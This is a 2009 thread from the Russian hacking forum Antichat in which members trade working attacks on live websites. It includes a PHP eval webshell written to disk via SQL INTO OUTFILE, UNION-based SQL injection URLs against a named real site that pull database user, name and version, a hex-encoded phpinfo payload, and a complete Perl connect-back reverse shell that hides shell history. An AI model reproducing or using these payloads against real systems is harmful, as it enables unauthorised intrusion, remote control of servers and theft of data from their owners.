ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.10.2009, 11:00
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Код:
Ваш SQL-запрос был успешно выполнен (Запрос занял 0.0661 сек)
SQL-запрос:
SELECT '<?php eval($_GET[e]); ?>'
FROM db
INTO OUTFILE '/tmp/1'
а тут норм все  ..
А как быстро найти папку с правами на запись?
кроме гугла и сканеров котрые по линкам ходят
Последний раз редактировалось Shadrin; 08.10.2009 в 11:07..
|
|
|
08.10.2009, 11:07
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Ключевая фраза
Сообщение от jokester
Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.
=)
На запись в /tmp права всегда есть. |
|
|
|
08.10.2009, 11:10
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
нет, это ясно,вопрос был в том что кавычки не ружутся при запись в tmp..вообщем папку надыбыл щас писать будемс
всем большое спасибо!
|
|
|
|
08.10.2009, 11:55
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
О мне выдаёт следующее:
Parse error: parse error, unexpected $ in /www/kinogild/www/htdocs/stalkerfest/page.php(44) : eval()'d code on line 1
Как это понимать? Растолкуйте кто нибудь пожалуйста!
|
|
|
|
08.10.2009, 12:08
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Код:
http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
вот как бы,если это в виду имел |
|
|
|
08.10.2009, 12:15
|
|
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548
Репутация:
134
|
|
Сообщение от Shadrin
Код:
http://www.stalkerfest.org/page.php?page=-29+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14--
вот как бы,если это в виду имел Да, имел ввиду именно это. Спасибо. Я просто не сообразил что в желтом поле выводился номер принтабельного поля, думал ошибка какаято.
Зачем знак комментария в конце? И без него то же самое отображает вроде
Последний раз редактировалось _iks_; 08.10.2009 в 12:19..
|
|
|
|
08.10.2009, 12:41
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.stalkerfest.org/page.php?page=-29+union+select+1,2,3,0x706870696e666f28293b,5,6,7 ,8,9,10,11,12,13,14/*
|
|
|
|
08.10.2009, 13:34
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от krypt3r
Ключевая фраза
=)
На запись в /tmp права всегда есть.
Не всегда 
|
|
|
|
08.10.2009, 13:40
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Сообщение от _iks_
Зачем знак комментария в конце? И без него то же самое отображает вроде
я привык,не всегда нормально отображается без него
|
|
|
|
08.10.2009, 14:55
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
Не пойму почему не делается бек-коннект  Делаю следующее...
У себя в cmd прописал start nc -l -p 80
Залил перловый бэкдор
Код:
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== Backdoor -=====- Hello Melkiy ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
С шелла пишу perl sd.pl 123.123.123.123[свой IP] 80
И выдаёт:
--== Backdoor -=====- Hello Melkiy ==--
[-] Unable to Connect Host
В чём проблема?
P.S Пробовал другие порты, тоже самое... |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1580541){kind=avatar}
Похожие темы
Линейный вид
